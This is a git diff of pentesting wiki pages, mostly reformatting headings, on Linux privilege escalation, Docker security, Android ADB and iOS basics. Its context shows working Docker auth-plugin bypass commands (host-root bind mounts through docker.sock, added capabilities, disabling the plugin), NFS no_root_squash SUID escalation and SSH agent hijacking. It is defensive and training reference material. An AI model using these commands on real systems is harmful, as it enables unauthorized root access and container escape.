b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -1,8 +1,10 @@ +# Docker Access Authorization Plugin + {{#include ../../../banners/hacktricks-training.md}} **Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon. -# Basic architecture +## Basic architecture Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**. @@ -22,13 +24,13 @@ For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), s During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies. -## Several Plugins +### Several Plugins You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted. -# Plugin Examples +## Plugin Examples -## Twistlock AuthZ Broker +### Twistlock AuthZ Broker The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user. @@ -36,29 +38,29 @@ This is an example that will allow Alice and Bob can create new containers: `{"n In the page [route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action -## Simple Plugin Tutorial +### Simple Plugin Tutorial You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) Read the `README` and the `plugin.go` code to understand how is it working. -# Docker Auth Plugin Bypass +## Docker Auth Plugin Bypass -## Enumerate access +### Enumerate access The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**. To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**.** -## disallowed `run --privileged` +### disallowed `run --privileged` -### Minimum Privileges +#### Minimum Privileges ```bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash ``` -### Running a container and then getting a privileged session +#### Running a container and then getting a privileged session In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: @@ -84,7 +86,7 @@ docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a3 Now, the user can escape from the container using any of the [**previously discussed techniques**](#privileged-flag) and **escalate privileges** inside the host. -## Mount Writable Folder +### Mount Writable Folder In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: @@ -104,15 +106,15 @@ host> /tmp/bash > > Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) -## Unchecked API Endpoint +### Unchecked API Endpoint The responsibility of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.** You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) -## Unchecked JSON Structure +### Unchecked JSON Structure -### Binds in root +#### Binds in root It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\ In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: @@ -130,7 +132,7 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it > [!WARNING] > Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`** -### Binds in HostConfig +#### Binds in HostConfig Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: @@ -138,7 +140,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create ``` -### Mounts in root +#### Mounts in root Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: @@ -146,7 +148,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create ``` -### Mounts in HostConfig +#### Mounts in HostConfig Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: @@ -154,7 +156,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre ``` -## Unchecked JSON Attribute +### Unchecked JSON Attribute It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability: @@ -171,7 +173,7 @@ capsh --print > [!TIP] > The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions. -## Disabling Plugin +### Disabling Plugin If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it! @@ -189,7 +191,7 @@ docker plugin enable authobot Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**! -## Auth Plugin Bypass writeups +### Auth Plugin Bypass writeups - [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/) diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index f5d6b4820..810805fbe 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -1,6 +1,8 @@ +# Release Agent Exploit: Relative Paths to PIDs + {{#include ../../../../banners/hacktricks-training.md}} -For further details **check the blog port from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: +For further details **check the blog post from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: The technique outlines a method for **executing host code from within a container**, overcoming challenges posed by storage-driver configurations that obscure the container's filesystem path on the host, like Kata Containers or specific `devicemapper` settings. diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index a35b0ab04..a6d1f5b9e 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -136,7 +136,8 @@ int main(void) { - Used for handling kernel device `uevents`. - Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers. -- **Example for Exploitation**: %%%bash +- **Example for Exploitation**: +```bash #### Creates a payload @@ -156,7 +157,8 @@ int main(void) { #### Reads the output - cat /output %%% + cat /output + ``` #### **`/sys/class/thermal`** diff --git a/src/linux-hardening/privilege-escalation/logstash.md b/src/linux-hardening/privilege-escalation/logstash.md index e2e369d64..de5970674 100644 --- a/src/linux-hardening/privilege-escalation/logstash.md +++ b/src/linux-hardening/privilege-escalation/logstash.md @@ -1,3 +1,5 @@ +# Logstash Privilege Escalation + {{#include ../../banners/hacktricks-training.md}} ## Logstash diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 18fb0d773..08071e298 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,7 +1,9 @@ +# NFS No Root Squash Misconfiguration Privilege Escalation + {{#include ../../banners/hacktricks-training.md}} -# Squashing Basic Info +## Squashing Basic Info NFS will usually (specially in linux) trust the indicated `uid` and `gid` by the client conencting to access the files (if kerberos is not used). However, there are some configurations that can be set in the server to **change this behavior**: @@ -17,9 +19,9 @@ For more information about **NFS** check: ../../network-services-pentesting/nfs-service-pentesting.md {{#endref}} -# Privilege Escalation +## Privilege Escalation -## Remote Exploit +### Remote Exploit Option 1 using bash: - **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. @@ -57,7 +59,7 @@ cd ./payload #ROOT shell ``` -## Local Exploit +### Local Exploit > [!TIP] > Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\ @@ -65,11 +67,11 @@ cd > Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\ > --_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- -## Basic Information +### Basic Information The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls. -### Compiling the Library +#### Compiling the Library The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands: @@ -80,7 +82,7 @@ make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` -### Conducting the Exploit +#### Conducting the Exploit The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls: @@ -108,7 +110,7 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs:/ #root ``` -## Bonus: NFShell for Stealthy File Access +### Bonus: NFShell for Stealthy File Access Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues: diff --git a/src/linux-hardening/privilege-escalation/selinux.md b/src/linux-hardening/privilege-escalation/selinux.md index e8a2ce0f6..d0f138c2b 100644 --- a/src/linux-hardening/privilege-escalation/selinux.md +++ b/src/linux-hardening/privilege-escalation/selinux.md @@ -1,6 +1,8 @@ +# # SELinux + {{#include ../../banners/hacktricks-training.md}} -# SELinux in Containers +## SELinux in Containers [Introduction and example from the redhat docs](https://www.redhat.com/sysadmin/privileged-flag-container-engines) @@ -16,7 +18,7 @@ LABEL system_u:system_r:container_t:s0:c647,c780 ``` -# SELinux Users +## SELinux Users There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. diff --git a/src/linux-hardening/privilege-escalation/socket-command-injection.md b/src/linux-hardening/privilege-escalation/socket-command-injection.md index 35724b2e7..d328a2019 100644 --- a/src/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/src/linux-hardening/privilege-escalation/socket-command-injection.md @@ -1,3 +1,5 @@ +# Socket Command Injection + {{#include ../../banners/hacktricks-training.md}} ## Socket binding example with Python diff --git a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index f4decda94..b6ff4cfce 100644 --- a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -1,6 +1,8 @@ +# SSH Agent Forwarding Exploitation + {{#include ../../banners/hacktricks-training.md}} -# Summary +## Summary What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: @@ -16,7 +18,7 @@ Impersonate Bob using one of Bob's ssh-agent: SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston ``` -## Why does this work? +### Why does this work? When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it. @@ -24,7 +26,7 @@ As the private key is saved in the memory of the agent uncrypted, I suppose that Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. -# Long explanation and exploitation +## Long explanation and exploitation **Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index d4a14d137..e640b4ad1 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,3 +1,5 @@ +# Wildcards Spare Tricks + {{#include ../../banners/hacktricks-training.md}} ## chown, chmod diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index 7c50b0ed1..e22eb9ef3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md @@ -10,7 +10,10 @@ Bundles in macOS serve as containers for a variety of resources including applic Within a bundle, particularly within the `.app/Contents/` directory, a variety of important resources are housed: -- **\_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: %%%bash openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 %%% +- **\_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: +```bash +openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 +``` - **MacOS**: Contains the executable binary of the application that runs upon user interaction. - **Resources**: A repository for the application's user interface components including images, documents, and interface descriptions (nib/xib files). - **Info.plist**: Acts as the application's main configuration file, crucial for the system to recognize and interact with the application appropriately. diff --git a/src/mobile-pentesting/android-app-pentesting/adb-commands.md b/src/mobile-pentesting/android-app-pentesting/adb-commands.md index 0b797b0c2..7ac1903ec 100644 --- a/src/mobile-pentesting/android-app-pentesting/adb-commands.md +++ b/src/mobile-pentesting/android-app-pentesting/adb-commands.md @@ -1,3 +1,5 @@ +# ADB Commands + {{#include ../../banners/hacktricks-training.md}} **Adb is usually located in:** @@ -12,7 +14,7 @@ C:\Users\\AppData\Local\Android\sdk\platform-tools\adb.exe **Information obtained from:** [**http://adbshell.com/**](http://adbshell.com) -# Connection +## Connection ``` adb devices @@ -40,7 +42,7 @@ adb server version (41) doesn't match this client (36); killing... It's because you are trying to connect to an ADB server with a different version. Just try to find the adb binary the software is using (go to `C:\Program Files\Genymobile\Genymotion` and search for adb.exe) -## Several devices +### Several devices Whenever you find **several devices connected to your machine** you will need to **specify in which one** you want to run the adb command. @@ -57,7 +59,7 @@ x86_64:/ # whoami root ``` -## Port Tunneling +### Port Tunneling In case the **adb** **port** is only **accessible** from **localhost** in the android device but **you have access via SSH**, you can **forward the port 5555** and connect via adb: @@ -66,11 +68,11 @@ ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222 adb connect 127.0.0.1:5555 ``` -# Packet Manager +## Packet Manager -## Install/Uninstall +### Install/Uninstall -### adb install \[option] \ +#### adb install \[option] \ ```bash adb install test.apk @@ -88,7 +90,7 @@ adb install -d test.apk # allow version code downgrade adb install -p test.apk # partial application install ``` -### adb uninstall \[options] \ +#### adb uninstall \[options] \ ```bash adb uninstall com.test.app @@ -96,11 +98,11 @@ adb uninstall com.test.app adb uninstall -k com.test.app Keep the data and cache directories around after package removal. ``` -## Packages +### Packages Prints all packages, optionally only those whose package name contains the text in \. -### adb shell pm list packages \[options] \ +#### adb shell pm list packages \[options] \ ```bash adb shell pm list packages @@ -122,7 +124,7 @@ adb shell pm list packages -u #Also include uninstalled packages. adb shell pm list packages --user #The user space to query. ``` -### adb shell pm path \ +#### adb shell pm path \ Print the path to the APK of the given . @@ -130,7 +132,7 @@ Print the path to the APK of the given . adb shell pm path com.android.phone ``` -### adb shell pm clear \ +#### adb shell pm clear \ Delete all data associated with a package. @@ -138,7 +140,7 @@ Delete all data associated with a package. adb shell pm clear com.test.abc ``` -# File Manager +## File Manager ### adb pull \ \[local] @@ -156,7 +158,7 @@ Upload a specified file from your computer to an emulator/device. adb push test.apk /sdcard ``` -# Screencapture/Screenrecord +## Screencapture/Screenrecord ### adb shell screencap \ @@ -183,7 +185,7 @@ adb shell screenrecord --verbose **You can download the files (images and videos) using **_**adb pull**_ -# Shell +## Shell ### adb shell @@ -214,7 +216,7 @@ am broadcast [] #Send a broadcast. Whiout options you can see the help input [text|keyevent] #Send keystrokes to device ``` -# Processes +## Processes If you want to get the PID of the process of your application you can execute: @@ -232,7 +234,7 @@ adb shell pidof com.your.application And it will print the PID of the application -# System +## System ```bash adb root @@ -246,9 +248,9 @@ adb sideload flashing/restoring Android update.zip packages. -# Logs +## Logs -## Logcat +### Logcat To **filter the messages of only one application**, get the PID of the application and use grep (linux/macos) or findstr (windows) to filter the output of logcat: @@ -257,7 +259,7 @@ adb logcat | grep 4526 adb logcat | findstr 4526 ``` -### adb logcat \[option] \[filter-specs] +#### adb logcat \[option] \[filter-specs] ```bash adb logcat @@ -281,7 +283,7 @@ adb logcat *:F # filter to only show Fatal level adb logcat *:S # Silent, highest priority, on which nothing is ever printed ``` -### adb logcat -b \ +#### adb logcat -b \ ```bash adb logcat -b # radio View the buffer that contains radio/telephony related messages. @@ -301,11 +303,11 @@ adb logcat -g # Prints the size of the specified log buffer and exits. adb logcat -n # Sets the maximum number of rotated logs to . ``` -## dumpsys +### dumpsys dumps system data -### adb shell dumpsys \[options] +#### adb shell dumpsys \[options] ```bash adb shell dumpsys @@ -329,7 +331,7 @@ adb shell dumpsys batterystats --reset erases old collection data adb shell dumpsys activity -# Backup +## Backup Backup an android device from adb. diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md index 2932c02db..091ff3ca2 100644 --- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -1,3 +1,5 @@ +# Content Protocol in Android + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index 10ab891d9..332e97030 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -1,3 +1,5 @@ +# Intent Injection + {{#include ../../banners/hacktricks-training.md}} **Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)** diff --git a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index 00b7a816b..7a1b73039 100644 --- a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -1,12 +1,14 @@ +# Make APK accept CA certificate + {{#include ../../banners/hacktricks-training.md}} Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. -# Automatic +## Automatic The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically** make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any). -# Manual +## Manual First we decompile the app: `apktool d *file-name*.apk` diff --git a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index e9b9715db..a77773ba5 100644 --- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -1,3 +1,5 @@ +# Manual De-obfuscation Techniques + {{#include ../../banners/hacktricks-training.md}} ## Manual **De-obfuscation Techniques** diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md index f57170e27..6221dc20e 100644 --- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -1,7 +1,7 @@ -{{#include ../../banners/hacktricks-training.md}} - # React Native Application Analysis +{{#include ../../banners/hacktricks-training.md}} + To confirm if the application was built on the React Native framework, follow these steps: 1. Rename the APK file with a zip extension and extract it to a new folder using the command `cp com.example.apk example-apk.zip` and `unzip -qq example-apk.zip -d ReactNative`. @@ -80,10 +80,6 @@ The tool **[hermes_rs](https://github.com/Pilfer/hermes_rs)** supports rebuildin You could try to dynamically analyze the app would be to use Frida to enable the developer mode of the React app and use **`react-native-debugger`** to attach to it. However, for this you need the source code of the app apparently. You can find more info about this in [https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/](https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/). - - - - ## References - [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7) diff --git a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index 6e7e434b2..4c8891c59 100644 --- a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -1,3 +1,5 @@ +# Spoofing Your Location in Google Play Store + {{#include ../../banners/hacktricks-training.md}} In situations where an application is restricted to certain countries, and you're unable to install it on your Android device due to regional limitations, spoofing your location to a country where the app is available can grant you access. The steps below detail how to do this: diff --git a/src/mobile-pentesting/ios-pentesting/ios-basics.md b/src/mobile-pentesting/ios-pentesting/ios-basics.md index 0f9a8ea0f..7f43410d3 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/src/mobile-pentesting/ios-pentesting/ios-basics.md @@ -1,12 +1,14 @@ +# iOS Basics + {{#include ../../banners/hacktricks-training.md}} -# Privilege Separation and Sandbox +## Privilege Separation and Sandbox In iOS, a distinction in privilege exists between the user-accessible applications and the system's core processes. Applications run under the **`mobile`** user identity, while the crucial system processes operate as **`root`**. This separation is enhanced by a sandbox mechanism, which imposes strict limitations on what actions applications can undertake. For instance, even if applications share the same user identity, they are prohibited from accessing or modifying each other's data. Applications are installed in a specific directory (`private/var/mobile/Applications/{random ID}`) and have restricted read access to certain system areas and functionalities, such as SMS and phone calls. Access to protected areas triggers a pop-up request for user permission. -# Data Protection +## Data Protection iOS offers developers the **Data Protection APIs**, built atop the Secure Enclave Processor (SEP) — a dedicated coprocessor for cryptographic operations and key management. The SEP ensures data protection integrity via a unique device-specific key, the device UID, embedded within it. @@ -32,13 +34,13 @@ cd FileDp-Source python filedp.py /path/to/check ``` -## **The Keychain** +### **The Keychain** In iOS, a **Keychain** serves as a secure **encrypted container** for storing **sensitive information**, accessible only by the application that stored it or those explicitly authorized. This encryption is fortified by a unique **password generated by iOS**, which itself is encrypted with **AES**. This encryption process leverages a **PBKDF2 function**, combining the user's passcode with a salt derived from the device's **UID**, a component only the **secure enclave chipset** can access. Consequently, even if the user's passcode is known, the Keychain contents remain inaccessible on any device other than the one where they were originally encrypted. **Management and access** to the Keychain data are handled by the **`securityd` daemon**, based on specific app entitlements like `Keychain-access-groups` and `application-identifier`. -### **Keychain API Operations** +#### **Keychain API Operations** The Keychain API, detailed at [Apple's Keychain Services documentation](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), provides essential functions for secure storage management: @@ -49,7 +51,7 @@ The Keychain API, detailed at [Apple's Keychain Services documentation](https:// Brute-forcing the Keychain password involves either attacking the encrypted key directly or attempting to guess the passcode on the device itself, hindered significantly by secure enclave's enforcement of a delay between failed attempts. -### **Configuring Keychain Item Data Protection** +#### **Configuring Keychain Item Data Protection** Data protection levels for Keychain items are set using the `kSecAttrAccessible` attribute during item creation or update. These levels, [as specified by Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), determine when and how Keychain items are accessible: @@ -63,12 +65,12 @@ Data protection levels for Keychain items are set using the `kSecAttrAccessible` **`AccessControlFlags`** further refine access methods, allowing for biometric authentication or passcode use. -### **Jailbroken Devices Warning** +#### **Jailbroken Devices Warning** > [!WARNING] > On **jailbroken devices**, the Keychain's protections are compromised, posing a significant security risk. -### **Persistence of Keychain Data** +#### **Persistence of Keychain Data** Unlike app-specific data deleted upon app uninstallation, **Keychain data persists** on the device. This characteristic could enable new owners of a second-hand device to access the previous owner's application data simply by reinstalling apps. Developers are advised to proactively clear Keychain data upon app installation or during logout to mitigate this risk. Here's a Swift code example demonstrating how to clear Keychain data upon the first app launch: @@ -84,7 +86,7 @@ if userDefaults.bool(forKey: "hasRunBefore") == false { } ``` -# **App Capabilities** +## **App Capabilities** In the realm of app development, **sandboxing** plays a crucial role in enhancing security. This process ensures that each app operates within its own unique home directory, thus preventing it from accessing system files or data belonging to other apps. The enforcement of these restrictions is carried out through sandbox policies, which are a part of the **Trusted BSD (MAC) Mandatory Access Control Framework**. @@ -111,7 +113,7 @@ For example, the purpose strings in the `Info.plist` file might look like this: Your location is used to provide turn-by-turn directions to your destination. ``` -## Device Capabilities +### Device Capabilities The `Info.plist` file of an app specifies **device capabilities** that help the App Store filter apps for device compatibility. These are defined under the **`UIRequiredDeviceCapabilities`** key. For instance: @@ -124,11 +126,11 @@ The `Info.plist` file of an app specifies **device capabilities** that help the This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC. -## Entitlements +### Entitlements **Entitlements** are another critical aspect of iOS app development, serving as key-value pairs that grant apps permission to perform certain operations beyond runtime checks. For example, enabling **Data Protection** in an app involves adding a specific entitlement in the Xcode project, which is then reflected in the app's entitlements file or the embedded mobile provision file for IPAs. -# References +## References - [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage) - [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) diff --git a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index 22843155d..bc2e13ad0 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -1,3 +1,5 @@ +# iOS Hooking with Objection + {{#include ../../banners/hacktricks-training.md}} For this section the tool [**Objection**](https://github.com/sensepost/objection) is going to be used.\ @@ -10,9 +12,9 @@ objection -d --gadget "OWASP.iGoat-Swift" explore You can execute also `frida-ps -Uia` to check the running processes of the phone. -# Basic Enumeration of the app +## Basic Enumeration of the app -## Local App Paths +### Local App Paths - `env`: Find the paths where the application is stored inside the device @@ -27,7 +29,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library ``` -## List Bundles, frameworks and libraries +### List Bundles, frameworks and libraries - `ios bundles list_bundles`: List bundles of the application @@ -108,7 +110,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [..] ``` -## List classes of an APP +### List classes of an APP - `ios hooking list classes`: List classes of the app @@ -147,7 +149,7 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [...] ``` -## List class methods +### List class methods - `ios hooking list class_methods`: List methods of a specific class @@ -181,11 +183,11 @@ You can execute also `frida-ps -Uia` to check the running processes of the phone [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] ``` -# Basic Hooking +## Basic Hooking Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. -## Hook all methods of a class +### Hook all methods of a class - 